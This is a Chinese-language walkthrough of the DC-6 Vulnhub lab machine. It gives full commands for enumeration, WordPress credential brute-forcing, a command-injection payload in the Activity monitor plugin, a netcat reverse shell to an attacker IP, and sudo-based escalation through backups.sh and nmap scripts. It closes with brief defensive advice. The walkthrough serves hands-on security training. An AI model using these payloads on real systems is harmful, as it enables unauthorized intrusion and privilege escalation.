DC-6 靶机渗透测试详细教程

靶机概述

DC-6 是 Vulnhub 上的一个渗透测试靶机，基于 WordPress 构建，包含多种漏洞和提权路径。

环境准备

下载与部署

1. 下载地址：https://download.vulnhub.com/dc/DC-6.zip
2. 解压后导入.ova文件到虚拟机（忽略导入过程中的错误提示）
3. 网络配置建议使用NAT模式

渗透测试过程

1. 信息收集

网络扫描

arp-scan -l  # 发现靶机IP
nmap -A -T4 -p- 192.168.237.150  # 深度扫描

发现开放端口：

• 22端口：SSH服务
• 80端口：HTTP服务

网站访问

1. 需要修改攻击机的hosts文件：

vi /etc/hosts
# 添加：192.168.237.150 wordy

2. 目录扫描：

dirb http://192.168.237.150/

发现后台登录地址：http://192.168.237.150/wp-admin

2. WordPress漏洞利用

WPScan扫描

1. 扫描漏洞：

wpscan --url http://wordy/ --enumerate vt

2. 枚举用户：

wpscan --url http://wordy/ --enumerate u

获取5个用户名，保存到user.txt

3. 准备密码字典：

gunzip /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

4. 爆破凭证：

wpscan --url http://wordy/ -U user.txt -P passwords.txt

获取有效凭证：mark/helpdesk01

3. 获取初始Shell

1. 登录WordPress后台
2. 在"Activity monitor"功能点发现命令注入漏洞
3. 测试命令执行：

127.0.0.1 | ls

4. 反弹Shell：

# 攻击机监听：
nc -lvvp 4444

# 靶机执行：
127.0.0.1 | nc 192.168.237.148 4444 -e /bin/bash

5. 升级交互式Shell：

python -c 'import pty;pty.spawn("/bin/bash")'

4. 横向移动

1. 在/home/mark/stuff/things-to-do.txt发现新凭证：

graham/GSo7isUM1D4

2. SSH登录：

ssh graham@192.168.237.150

3. 检查sudo权限：

sudo -l

发现可以无密码以jens用户执行/home/jens/backups.sh

4. 修改backups.sh添加反弹Shell：

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens ./backups.sh

5. 提权到root

1. 在jens用户下检查sudo权限：

sudo -l

发现可以无密码以root执行/usr/bin/nmap

2. 创建nmap脚本提权：

echo 'os.execute("/bin/bash")' >> shell
sudo nmap --script=shell

3. 获取flag：

cd /root
cat theflag.txt

关键知识点总结

1. 主机发现：使用arp-scan和nmap进行网络扫描
2. WordPress枚举：WPScan工具的用户枚举和密码爆破
3. 命令注入：通过Activity monitor功能点实现
4. 横向移动：
   • 通过文件枚举发现新凭证
   • 利用sudo权限执行脚本提权
5. 特权升级：
   • 利用nmap的交互模式执行系统命令
   • 注意无回显情况下的命令执行

防御建议

1. 加强WordPress密码策略
2. 限制Activity monitor插件的命令执行功能
3. 合理配置sudo权限
4. 避免使用nmap等工具的特权执行